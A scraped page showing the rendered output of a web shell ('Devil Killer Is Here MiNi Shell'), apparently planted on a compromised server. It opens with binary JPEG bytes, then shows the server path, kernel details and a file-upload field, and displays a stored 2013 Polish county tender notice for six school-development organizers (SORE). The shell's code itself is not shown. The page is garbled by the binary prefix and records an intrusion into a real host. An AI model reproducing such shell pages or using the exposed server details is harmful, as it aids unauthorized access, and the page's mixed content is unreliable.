JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130912/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130912/371218-N-2013.html

<p class="kh_header"><b>Piła: Wybór Szkolnych Organizatorów Rozwoju Edukacji (SORE) - w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013</b><br>
<b>Numer ogłoszenia: 371218 - 2013; data zamieszczenia: 12.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Pilski reprezentowany przez Zarząd Powiatu w Pile , al. Niepodległości 33/35, 64-920 Piła, woj. wielkopolskie, tel. 67 2109442, faks 067 2109332.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór Szkolnych Organizatorów Rozwoju Edukacji (SORE) - w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wybór Szkolnego Organizatora Rozwoju Edukacji (SORE) w ramach projektu realizowanego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013.  
Zamawiający dzieli zamówienie na sześć części. Każdy z Wykonawców uczestniczących w postępowaniu może złożyć ofertę na jedną, dwie, trzy, cztery, pięć lub sześć części zamówienia.
Część 1 - Szkolny Organizator Rozwoju Edukacji nr 1 (SORE 1)
1. Wykaz szkół/przedszkoli oraz liczba osób:
Liczba szkół/przedszkoli z terenu powiatu pilskiego - 6. Przydział placówek nastąpi po zakończeniu postępowania, odrębnie na każdy rok szkolny: 2013/2014 i 2014/2015. 
2. Wykaz zadań SORE (80h/mc):
a)  stały kontakt ze szkołą/przedszkolem - z dyrektorem i radą pedagogiczną, 
b) współpraca z dyrektorem i radą pedagogiczną w przeprowadzaniu diagnozy potrzeb i określeniu obszarów wsparcia,
c) przeprowadzenie warsztatu diagnostyczno-rozwojowego dla zespołu wyłonionego z rady pedagogicznej,
d) przygotowanie Rocznego Planu Wspomagania (RPW), w tym dostosowanie ofert doskonalenia do zdiagnozowanych potrzeb konkretnej szkoły/przedszkola,
e) przygotowanie harmonogramu szkoleń we współpracy z dyrektorem szkoły/przedszkola,
f) wsparcie szkoły/przedszkola i dyrektora na kolejnych etapach przygotowania i realizacji RPW,
g) odpowiedzialność za prawidłową organizację działań związanych z zewnętrznym wspomaganiem,
h) pozyskiwanie zewnętrznych ekspertów,
i) wsparcie nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur,
j) monitorowanie procesu doskonalenia - prowadzenie spotkań, konsultacji grupowych i indywidualnych z dyrektorami, nauczycielami, ekspertami,
k) dokumentowanie podejmowanych działań poprzez: scenariusze warsztatów i konsultacji, protokoły z wywiadów z dyrektorami szkół/przedszkoli, kwestionariusze diagnostyczne, protokoły spotkań z radą pedagogiczną, dzienniki zajęć z realizacji form doskonalenia, wykaz ofert doskonalenia z poszczególnych szkół/przedszkoli, ankiety ewaluacyjne ze szkoleń, harmonogramy realizacji RPW,
l) opracowanie sprawozdań z realizacji rocznego planu wspomagania w każdej szkole/przedszkolu,
ł) przedstawienie sprawozdań z przebiegu realizacji RPW dyrektorowi szkoły/przedszkola oraz radzie pedagogicznej.
Część 2 - Szkolny Organizator Rozwoju Edukacji nr 2 (SORE 2)
1. Wykaz szkół/przedszkoli oraz liczba osób:
Liczba szkół/przedszkoli z terenu powiatu pilskiego - 6. Przydział placówek nastąpi po zakończeniu postępowania, odrębnie na każdy rok szkolny: 2013/2014 i 2014/2015. 
2. Wykaz zadań SORE (80h/mc):
a)  stały kontakt ze szkołą/przedszkolem - z dyrektorem i radą pedagogiczną, 
b) współpraca z dyrektorem i radą pedagogiczną w przeprowadzaniu diagnozy potrzeb i określeniu obszarów wsparcia,
c) przeprowadzenie warsztatu diagnostyczno-rozwojowego dla zespołu wyłonionego z rady pedagogicznej,
d) przygotowanie Rocznego Planu Wspomagania (RPW), w tym dostosowanie ofert doskonalenia do zdiagnozowanych potrzeb konkretnej szkoły/przedszkola,
e) przygotowanie harmonogramu szkoleń we współpracy z dyrektorem szkoły/przedszkola,
f) wsparcie szkoły/przedszkola i dyrektora na kolejnych etapach przygotowania i realizacji RPW,
g) odpowiedzialność za prawidłową organizację działań związanych z zewnętrznym wspomaganiem,
h) pozyskiwanie zewnętrznych ekspertów,
i) wsparcie nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur,
j) monitorowanie procesu doskonalenia - prowadzenie spotkań, konsultacji grupowych i indywidualnych z dyrektorami, nauczycielami, ekspertami,
k) dokumentowanie podejmowanych działań poprzez: scenariusze warsztatów i konsultacji, protokoły z wywiadów z dyrektorami szkół/przedszkoli, kwestionariusze diagnostyczne, protokoły spotkań z radą pedagogiczną, dzienniki zajęć z realizacji form doskonalenia, wykaz ofert doskonalenia z poszczególnych szkół/przedszkoli, ankiety ewaluacyjne ze szkoleń, harmonogramy realizacji RPW,
l) opracowanie sprawozdań z realizacji rocznego planu wspomagania w każdej szkole/przedszkolu,
ł) przedstawienie sprawozdań z przebiegu realizacji RPW dyrektorowi szkoły/przedszkola oraz radzie pedagogicznej.
Część 3 - Szkolny Organizator Rozwoju Edukacji nr 3 (SORE 3)
1. Wykaz szkół/przedszkoli oraz liczba osób:
Liczba szkół/przedszkoli z terenu powiatu pilskiego - 6. Przydział placówek nastąpi po zakończeniu postępowania, odrębnie na każdy rok szkolny: 2013/2014 i 2014/2015. 
2. Wykaz zadań SORE (80h/mc):
a)  stały kontakt ze szkołą/przedszkolem - z dyrektorem i radą pedagogiczną, 
b) współpraca z dyrektorem i radą pedagogiczną w przeprowadzaniu diagnozy potrzeb i określeniu obszarów wsparcia,
c) przeprowadzenie warsztatu diagnostyczno-rozwojowego dla zespołu wyłonionego z rady pedagogicznej,
d) przygotowanie Rocznego Planu Wspomagania (RPW), w tym dostosowanie ofert doskonalenia do zdiagnozowanych potrzeb konkretnej szkoły/przedszkola,
e) przygotowanie harmonogramu szkoleń we współpracy z dyrektorem szkoły/przedszkola,
f) wsparcie szkoły/przedszkola i dyrektora na kolejnych etapach przygotowania i realizacji RPW,
g) odpowiedzialność za prawidłową organizację działań związanych z zewnętrznym wspomaganiem,
h) pozyskiwanie zewnętrznych ekspertów,
i) wsparcie nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur,
j) monitorowanie procesu doskonalenia - prowadzenie spotkań, konsultacji grupowych i indywidualnych z dyrektorami, nauczycielami, ekspertami,
k) dokumentowanie podejmowanych działań poprzez: scenariusze warsztatów i konsultacji, protokoły z wywiadów z dyrektorami szkół/przedszkoli, kwestionariusze diagnostyczne, protokoły spotkań z radą pedagogiczną, dzienniki zajęć z realizacji form doskonalenia, wykaz ofert doskonalenia z poszczególnych szkół/przedszkoli, ankiety ewaluacyjne ze szkoleń, harmonogramy realizacji RPW,
l) opracowanie sprawozdań z realizacji rocznego planu wspomagania w każdej szkole/przedszkolu,
ł) przedstawienie sprawozdań z przebiegu realizacji RPW dyrektorowi szkoły/przedszkola oraz radzie pedagogicznej.
Część 4 - Szkolny Organizator Rozwoju Edukacji nr 4 (SORE 4)
1. Wykaz szkół/przedszkoli oraz liczba osób:
Liczba szkół/przedszkoli z terenu powiatu pilskiego - 6. Przydział placówek nastąpi po zakończeniu postępowania, odrębnie na każdy rok szkolny: 2013/2014 i 2014/2015. 
2. Wykaz zadań SORE (80h/mc):
a)  stały kontakt ze szkołą/przedszkolem - z dyrektorem i radą pedagogiczną, 
b) współpraca z dyrektorem i radą pedagogiczną w przeprowadzaniu diagnozy potrzeb i określeniu obszarów wsparcia,
c) przeprowadzenie warsztatu diagnostyczno-rozwojowego dla zespołu wyłonionego z rady pedagogicznej,
d) przygotowanie Rocznego Planu Wspomagania (RPW), w tym dostosowanie ofert doskonalenia do zdiagnozowanych potrzeb konkretnej szkoły/przedszkola,
e) przygotowanie harmonogramu szkoleń we współpracy z dyrektorem szkoły/przedszkola,
f) wsparcie szkoły/przedszkola i dyrektora na kolejnych etapach przygotowania i realizacji RPW,
g) odpowiedzialność za prawidłową organizację działań związanych z zewnętrznym wspomaganiem,
h) pozyskiwanie zewnętrznych ekspertów,
i) wsparcie nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur,
j) monitorowanie procesu doskonalenia - prowadzenie spotkań, konsultacji grupowych i indywidualnych z dyrektorami, nauczycielami, ekspertami,
k) dokumentowanie podejmowanych działań poprzez: scenariusze warsztatów i konsultacji, protokoły z wywiadów z dyrektorami szkół/przedszkoli, kwestionariusze diagnostyczne, protokoły spotkań z radą pedagogiczną, dzienniki zajęć z realizacji form doskonalenia, wykaz ofert doskonalenia z poszczególnych szkół/przedszkoli, ankiety ewaluacyjne ze szkoleń, harmonogramy realizacji RPW,
l) opracowanie sprawozdań z realizacji rocznego planu wspomagania w każdej szkole/przedszkolu,
ł) przedstawienie sprawozdań z przebiegu realizacji RPW dyrektorowi szkoły/przedszkola oraz radzie pedagogicznej.
Część 5 - Szkolny Organizator Rozwoju Edukacji nr 5 (SORE 5)
1. Wykaz szkół/przedszkoli oraz liczba osób:
Liczba szkół/przedszkoli z terenu powiatu pilskiego - 6. Przydział placówek nastąpi po zakończeniu postępowania, odrębnie na każdy rok szkolny: 2013/2014 i 2014/2015. 
2. Wykaz zadań SORE (80h/mc):
a)  stały kontakt ze szkołą/przedszkolem - z dyrektorem i radą pedagogiczną, 
b) współpraca z dyrektorem i radą pedagogiczną w przeprowadzaniu diagnozy potrzeb i określeniu obszarów wsparcia,
c) przeprowadzenie warsztatu diagnostyczno-rozwojowego dla zespołu wyłonionego z rady pedagogicznej,
d) przygotowanie Rocznego Planu Wspomagania (RPW), w tym dostosowanie ofert doskonalenia do zdiagnozowanych potrzeb konkretnej szkoły/przedszkola,
e) przygotowanie harmonogramu szkoleń we współpracy z dyrektorem szkoły/przedszkola,
f) wsparcie szkoły/przedszkola i dyrektora na kolejnych etapach przygotowania i realizacji RPW,
g) odpowiedzialność za prawidłową organizację działań związanych z zewnętrznym wspomaganiem,
h) pozyskiwanie zewnętrznych ekspertów,
i) wsparcie nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur,
j) monitorowanie procesu doskonalenia - prowadzenie spotkań, konsultacji grupowych i indywidualnych z dyrektorami, nauczycielami, ekspertami,
k) dokumentowanie podejmowanych działań poprzez: scenariusze warsztatów i konsultacji, protokoły z wywiadów z dyrektorami szkół/przedszkoli, kwestionariusze diagnostyczne, protokoły spotkań z radą pedagogiczną, dzienniki zajęć z realizacji form doskonalenia, wykaz ofert doskonalenia z poszczególnych szkół/przedszkoli, ankiety ewaluacyjne ze szkoleń, harmonogramy realizacji RPW,
l) opracowanie sprawozdań z realizacji rocznego planu wspomagania w każdej szkole/przedszkolu,
ł) przedstawienie sprawozdań z przebiegu realizacji RPW dyrektorowi szkoły/przedszkola oraz radzie pedagogicznej.
Część 6 - Szkolny Organizator Rozwoju Edukacji nr 6 (SORE 6)
1. Wykaz szkół/przedszkoli oraz liczba osób:
Liczba szkół/przedszkoli z terenu powiatu pilskiego - 6. Przydział placówek nastąpi po zakończeniu postępowania, odrębnie na każdy rok szkolny: 2013/2014 i 2014/2015. 
2. Wykaz zadań SORE (80h/mc):
a)  stały kontakt ze szkołą/przedszkolem - z dyrektorem i radą pedagogiczną, 
b) współpraca z dyrektorem i radą pedagogiczną w przeprowadzaniu diagnozy potrzeb i określeniu obszarów wsparcia,
c) przeprowadzenie warsztatu diagnostyczno-rozwojowego dla zespołu wyłonionego z rady pedagogicznej,
d) przygotowanie Rocznego Planu Wspomagania (RPW), w tym dostosowanie ofert doskonalenia do zdiagnozowanych potrzeb konkretnej szkoły/przedszkola,
e) przygotowanie harmonogramu szkoleń we współpracy z dyrektorem szkoły/przedszkola,
f) wsparcie szkoły/przedszkola i dyrektora na kolejnych etapach przygotowania i realizacji RPW,
g) odpowiedzialność za prawidłową organizację działań związanych z zewnętrznym wspomaganiem,
h) pozyskiwanie zewnętrznych ekspertów,
i) wsparcie nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur,
j) monitorowanie procesu doskonalenia - prowadzenie spotkań, konsultacji grupowych i indywidualnych z dyrektorami, nauczycielami, ekspertami,
k) dokumentowanie podejmowanych działań poprzez: scenariusze warsztatów i konsultacji, protokoły z wywiadów z dyrektorami szkół/przedszkoli, kwestionariusze diagnostyczne, protokoły spotkań z radą pedagogiczną, dzienniki zajęć z realizacji form doskonalenia, wykaz ofert doskonalenia z poszczególnych szkół/przedszkoli, ankiety ewaluacyjne ze szkoleń, harmonogramy realizacji RPW,
l) opracowanie sprawozdań z realizacji rocznego planu wspomagania w każdej szkole/przedszkolu,
ł) przedstawienie sprawozdań z przebiegu realizacji RPW dyrektorowi szkoły/przedszkola oraz radzie pedagogicznej.

Obowiązkowe dodatkowe wymagania / zadania - dla każdego SORE:
a) dyspozycyjność, która umożliwi realizację zaplanowanych zadań w godzinach zgodnych z potrzebami uczestników, od poniedziałku do piątku. Rozpoczęcie realizacji zadań najwcześniej od godziny 8.00, a zakończenie może trwać najpóźniej do godziny 20.00;
b) zamawiający zastrzega sobie możliwość ewentualnej zmiany dni wykonywania zadań w sobotę i niedzielę;
c) konieczność posiadania telefonu komórkowego, emaila;
d) obowiązek uczestnictwa w spotkaniach / szkoleniach organizowanych przez Zamawiającego;
e) uczestnictwo w konferencjach, szkoleniach organizowanych na potrzeby projektu;
f) obowiązek ustalania harmonogramu pracy i wypracowywania miesięcznych godzin;
g) konieczność prowadzenia ewidencji godzin i zadań realizowanych w projekcie (ewentualne poprawki w dokumentacji nie będą wliczane do ewidencji);
h) treści przekazywane z zachowaniem równości szans;
i) monitoring treści przekazywanych w trakcie warsztatów grupowych oraz spotkań sieci;
j) w sytuacji losowej uniemożliwiającej wykonanie usługi obowiązek wyznaczenia osoby z co najmniej równymi kwalifikacjami - za zgodą Zamawiającego.

Informacje dodatkowe - dla każdego SORE:
a) czas dojazdu do szkół /przedszkoli na zajęcia, szkolenia i inne spotkania, nie wlicza się do rozliczenia godzin pracy;
b) wynagrodzenie obejmuje również: koszty dojazdów, noclegów, wyżywienia, rozmów telefonicznych; 
c) nie przewiduje się żadnych dodatkowych opłat za wykonanie usługi;
d) materiały biurowe zostaną przekazane przez biuro projektu (odbiór osobisty);
e) wynagrodzenie jest stałe, niezależne od liczby osób, szkół/przedszkoli;
f) zgodnie z Zasadami finansowania Programu Operacyjnego Kapitał Ludzki z dnia 24.12.2012 r. łączne zaangażowanie w realizację zadań we wszystkich projektach NSRO nie może przekraczać 240 godzin miesięcznie. Wykonawca przed podpisaniem umowy będzie zobowiązany do złożenia stosownego oświadczenia w tym zakresie. 
Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje osobami zdolnymi do realizacji zamówienia i w tym względzie udokumentuje, że dysponuje co najmniej jedną osobą na każdą część zamówienia, a osoba ta spełnia następujące warunki:
a) posiada wykształcenie wyższe z przygotowaniem pedagogicznym,
b) posiada stopień awansu zawodowego nauczyciela dyplomowanego,
c) posiada co najmniej 10-letni staż pracy jako nauczyciel,
d) ukończyła szkolenia w zakresie diagnozowania potrzeb rozwojowych szkół placówek edukacyjnych - w wymiarze co najmniej 30 godzin,
e) ukończyła szkolenia w zakresie planowania i realizacji wsparcia rozwojowego szkół placówek edukacyjnych - w wymiarze co najmniej 40 godzin,
f) przeprowadziła, w ciągu trzech lat przed terminem składania ofert, co najmniej 80 godzin zajęć z nauczycielami, dyrektorami szkół, radami pedagogicznymi (doświadczenie w pracy w systemie doskonalenia nauczycieli),
g) koordynowała pracami zespołów (zespołu szkolnego, zespołu przedmiotowego, zadaniowego, zespołu międzyszkolnego) - w wymiarze co najmniej 50 godzin, w okresie trzech lat przed terminem składania ofert, 
h) ukończyła kurs doskonalenia zawodowego w jednym z następujących obszarów:
- zmiany w edukacji,
- umiejętności społeczne,
- stosowanie w pracy technologii informacyjno-komunikacyjnych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony formularz Oferta - Załącznik nr 1 do SIWZ. 2) Pełnomocnictwo do podpisania oferty i umowy, jeżeli forma reprezentacji nie wynika z  innych dokumentów złożonych wraz z ofertą. 3) W przypadku zatrudnienia podwykonawców - informacja o zleceniu prac podwykonawcom - Załącznik nr 7 do SIWZ. 4) Pisemne zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania istotnych zmian postanowień zawartej Umowy zgodnie z warunkiem SIWZ, w szczególności zmiany Umowy mogą dotyczyć:
a) terminu wykonania przedmiotu Umowy;
b) zakresu zamówienia.
2. Zmiany, o których mowa powyżej  mogą nastąpić w następujących sytuacjach:
a) zmiana terminu wykonania przedmiotu Umowy może nastąpić w przypadku - wystąpienia siły wyższej,
b) na skutek zmian wprowadzonych przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pile
Al. Niepodległości 33/35
64-920 Piła.</p>
